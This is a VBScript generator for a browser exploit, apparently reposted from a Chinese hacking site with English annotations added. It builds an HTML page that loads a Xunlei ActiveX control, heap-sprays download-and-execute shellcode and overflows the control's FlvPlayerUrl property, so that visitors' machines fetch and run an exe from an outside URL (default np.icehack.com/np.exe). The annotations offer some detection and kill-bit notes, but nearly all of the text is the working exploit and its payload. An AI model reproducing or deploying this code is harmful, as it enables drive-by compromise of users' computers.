[vbs也写EXP]xunlei_0day_exp



 
来源:vbs空间

' Generator script: asks for a URL, then writes an HTML page (netpatch.htm) further below.
' The prompt text asks for the address of an exe to "download and execute"; the third
' argument is the default value shown in the input box.
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
' Everything down to the closing "end if" runs only when a non-empty URL was entered.
if exeurl <> "" then
' Opaque machine-code payload, stored as a string of escaped byte values. It is joined with
' the encoded URL and embedded in the generated page where the shellcode variable is written.
' NOTE(review): presumably a download-and-execute stub, going by the prompt text above; the
' bytes themselves were not analysed for this annotation.
code="/x43/x43/x43/x43/x43/x43/xe9/xa3/x00/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x68/x08/x8b/xf7/x6a/x04/x59/xe8/x43/x00/x00/x00/xe2/xf9/x68/x6f/x6e/x00/x00/x68/x75/x72/x6c/x6d/x54/xff/x16/x95/xe8/x2e/x00/x00/x00/x83/xec/x20/x8b/xdc/x6a/x20/x53/xff/x56/x04/xc7/x04/x03/x5c/x61/x2e/x65/xc7/x44/x03/x04/x78/x65/x00/x00/x33/xc0/x50/x50/x53/x57/x50/xff/x56/x10/x8b/xdc/x50/x53/xff/x56/x08/xff/x56/x0c/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56/x8b/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33/xdb/x0f/xbe/x10/x3a/xd6/x74/x08/xc1/xcb/x0d/x03/xda/x40/xeb/xf1/x3b/x1f/x75/xe7/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x58/xff/xff/xff/x8e/x4e/x0e/xec/xc1/x79/xe5/xb8/x98/xfe/x8a/x0e/xef/xce/xe0/x60/x36/x1a/x2f/x70"
' The URL with a NUL character appended; it is encoded and placed after the payload bytes.
' Incident-response note: the download URL is therefore recoverable from a captured page by
' decoding the tail of the string passed to unescape().
down=exeurl&Chr(00)
' Unicode(str1): returns str1 re-encoded as a run of "/x" + hex tokens, one token per character.
' Only the last two hex digits of each character code are kept, so a character whose code is
' above 0xFF loses its high byte.
Function Unicode(str1)
 Dim str,temp
 str = ""
 For i=1 to len(str1)
 ' Hex value of the character's code.
 temp = Hex(AscW(Mid(str1,i,1)))
 ' Left-pad with zeros and keep the rightmost two digits (applies whenever the hex text is
 ' shorter than five characters).
 If len(temp) < 5 Then temp = right("0000"&temp, 2)
 str = str & "/x" & temp
 Next
 Unicode = str
End Function
' replaceregex(str): rewrites each matched pair of escaped-byte tokens into one "%uXXXX" token.
' The two captured values are emitted in swapped order ($2 then $1). The caller passes the
' result to JavaScript unescape() in the generated page.
function replaceregex(str)
set regex=new regExp
' Two consecutive tokens, each capturing the two characters that follow its "x".
regex.pattern="//x(..)//x(..)"
regex.IgnoreCase=true
' Replace every occurrence, not only the first.
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
' Opens netpatch.htm in the current directory for appending (mode 8), creating it if missing.
' Because the mode is append, a second run adds another copy of the page to the same file.
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)

' --- Generated page, part 1: run-once gate ---
' The page looks for a "say_hello" cookie and runs the body only when it is absent.
' The expiry offset 0 * 0 * 1 * 1000 evaluates to 0 ms, so the expiry equals the current time.
fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var expires = new Date();"
fileS.writeline "expires.setTime(expires.getTime() + 0 * 0 * 1 * 1000);"
fileS.writeline "var set_cookie = document.cookie.indexOf(""say_hello=""); "
fileS.writeline "if (set_cookie == -1){document.cookie = ""say_hello=1;expires="" + expires.toGMTString();"
' Instantiates an ActiveX control by CLSID (the page title attributes it to Xunlei).
' Detection: this CLSID combined with a write to the FlvPlayerUrl property further down is the
' most specific indicator in the page.
' Mitigation: set the kill bit for this CLSID (Compatibility Flags 0x400 under Internet
' Explorer's "ActiveX Compatibility" registry key) or remove/update the control.
fileS.writeline "document.write('<object id=""gl"" classid=""clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F""></object>');"
' --- Generated page, part 2: heap spray ---
' The address constant 0x0c0c0c0c determines how many blocks are allocated below.
fileS.writeline "var helloworld2Address = 0x0c0c0c0c;"
' Payload string: the escaped bytes from "code" followed by the encoded URL, converted to %u
' form when this generator runs (not in the browser).
fileS.writeline "var shellcode = unescape("""&replaceregex(code&Unicode(down))&""");"
' Block size 0x100000 bytes; the filler is sized so that filler + payload stay just under that.
fileS.writeline "var hbshelloworld = 0x100000;"
fileS.writeline "var payLoadSize = shellcode.length * 2;"
fileS.writeline "var spraySlideSize = hbshelloworld - (payLoadSize+0x38);"
' Filler pattern of repeated 0x0c0c units. A long run of "%u0c0c" fed to unescape() and then
' doubled in a loop is a generic heap-spray signature worth matching in web content filters.
fileS.writeline "var spraySlide = unescape(""%u0c0c%u0c0c"");"
fileS.writeline "spraySlide = getSpraySlide(spraySlide,spraySlideSize);"
' Number of blocks: (0x0c0c0c0c - 0x100000) / 0x100000, i.e. a little under 192.
fileS.writeline "heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (i=0;i<heapBlocks;i++)"
fileS.writeline "{"
fileS.writeline " memory[i] = spraySlide + shellcode;"
fileS.writeline "}"
' Helper emitted into the page: doubles the filler until it is long enough, then trims it to
' spraySlideSize bytes (length is counted in 2-byte characters, hence the *2 and /2).
fileS.writeline "function getSpraySlide(spraySlide, spraySlideSize)"
fileS.writeline "{"
fileS.writeline "while (spraySlide.length*2<spraySlideSize)"
fileS.writeline "{"
fileS.writeline " spraySlide += spraySlide;"
fileS.writeline "}"
fileS.writeline "spraySlide = spraySlide.substring(0,spraySlideSize/2);"
fileS.writeline "return spraySlide;"
fileS.writeline "}"
' --- Generated page, part 3: trigger ---
' Builds a string of 0x0c characters at least 1070 long and assigns it to the control's
' FlvPlayerUrl property.
' NOTE(review): presumably the control copies this property into a fixed-size buffer without a
' length check; the control's code is not visible here, so confirm against vendor advisories.
fileS.writeline "var size_buff = 1070;"
fileS.writeline "var x = unescape(""%0c%0c%0c%0c"");"
fileS.writeline "while (x.length<size_buff) x += x;"
fileS.writeline "gl.FlvPlayerUrl = x;"
fileS.writeline "}"
fileS.writeline "</SCRIPT>"
' Second script block: reloads the page when the cookie was absent at load time.
fileS.writeline "<script>"
fileS.writeline "if (set_cookie == -1){"
fileS.writeline "location.reload();"
fileS.writeline "}"
' Last line of the page, followed by closing the output file.
fileS.writeline "</script>"files.Close
Set fso=nothing
' Message box text: "generation complete".
msgbox "生成完毕!"
end if